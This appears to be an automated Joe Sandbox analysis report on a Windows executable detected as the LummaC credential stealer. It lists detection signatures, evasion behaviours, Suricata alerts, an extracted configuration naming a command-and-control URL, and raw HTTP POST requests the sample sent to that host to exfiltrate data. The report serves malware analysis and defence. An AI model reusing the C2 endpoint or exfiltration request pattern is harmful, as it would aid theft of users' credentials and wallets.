Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561861
MD5:5e1ee83df7fd0f85791575eed5abffa8
SHA1:f08345571a764d0c1837951c26b75757f3328005
SHA256:15b5aa1fbb4d831060a3276e5ea6119ddc6a5228371dd99bd40c98d9e4937ad2
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5E1EE83DF7FD0F85791575EED5ABFFA8)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1420219520.000000000155F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7472JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 7472JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 7472JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-24T14:56:18.868806+010020283713Unknown Traffic192.168.2.749701172.67.162.84443TCP
            2024-11-24T14:56:20.867552+010020283713Unknown Traffic192.168.2.749702172.67.162.84443TCP
            2024-11-24T14:56:23.201819+010020283713Unknown Traffic192.168.2.749704172.67.162.84443TCP
            2024-11-24T14:56:25.561861+010020283713Unknown Traffic192.168.2.749705172.67.162.84443TCP
            2024-11-24T14:56:28.430843+010020283713Unknown Traffic192.168.2.749716172.67.162.84443TCP
            2024-11-24T14:56:30.795353+010020283713Unknown Traffic192.168.2.749722172.67.162.84443TCP
            2024-11-24T14:56:33.237543+010020283713Unknown Traffic192.168.2.749728172.67.162.84443TCP
            2024-11-24T14:56:37.184361+010020283713Unknown Traffic192.168.2.749743172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-24T14:56:19.547647+010020546531A Network Trojan was detected192.168.2.749701172.67.162.84443TCP
            2024-11-24T14:56:21.572038+010020546531A Network Trojan was detected192.168.2.749702172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-24T14:56:19.547647+010020498361A Network Trojan was detected192.168.2.749701172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-24T14:56:21.572038+010020498121A Network Trojan was detected192.168.2.749702172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-24T14:56:24.205397+010020480941Malware Command and Control Activity Detected192.168.2.749704172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-24T14:56:33.242954+010028438641A Network Trojan was detected192.168.2.749728172.67.162.84443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Found malware configuration
            Source: file.exe.7472.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49728 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]0_2_00BB98F0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_00BEB8E0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00BEB8E0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]0_2_00BBE0D8
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]0_2_00BBE35B

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49704 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49728 -> 172.67.162.84:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://property-imper.sbs/api
            Source: Joe Sandbox ViewIP Address: 172.67.162.84 172.67.162.84
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49716 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49743 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 172.67.162.84:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PXS8L39KKN0OTLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12826Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XOWQ8R70FVEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0K8HMKZ6QXJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20365Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BI31JNVDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1183Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HO9HQRQFY2M9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550291Host: property-imper.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.1392119115.0000000005D09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.1397093240.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
            Source: file.exe, 00000000.00000003.1441202945.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497536096.0000000005CEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497593408.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1502091584.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499118729.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497785054.0000000001559000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1498844199.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497801753.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441310758.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458069088.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
            Source: file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441310758.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458069088.0000000005CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
            Source: file.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiD
            Source: file.exe, 00000000.00000003.1418734369.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418665847.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apib
            Source: file.exe, 00000000.00000003.1497765661.0000000001575000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499176538.0000000001576000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458128435.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497573349.0000000001573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apif
            Source: file.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
            Source: file.exe, 00000000.00000002.1498844199.00000000014E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apil
            Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.1343709526.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1343792020.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
            Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
            Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
            Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1396696927.0000000006108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.7:49728 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574CC90_3_01574CC9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_015640D30_3_015640D3
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB98F00_2_00BB98F0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEB8E00_2_00BEB8E0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBE0D80_2_00BBE0D8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE90300_2_00BE9030
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB89A00_2_00BB89A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF0C800_2_00BF0C80
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF15800_2_00BF1580
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC95300_2_00BC9530
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01574C070_3_01574C07
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.999250768442623
            Source: file.exeStatic PE information: Section: mbsuitke ZLIB complexity 0.9943489819431852
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.1344317173.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1344093780.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1368622534.0000000005D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
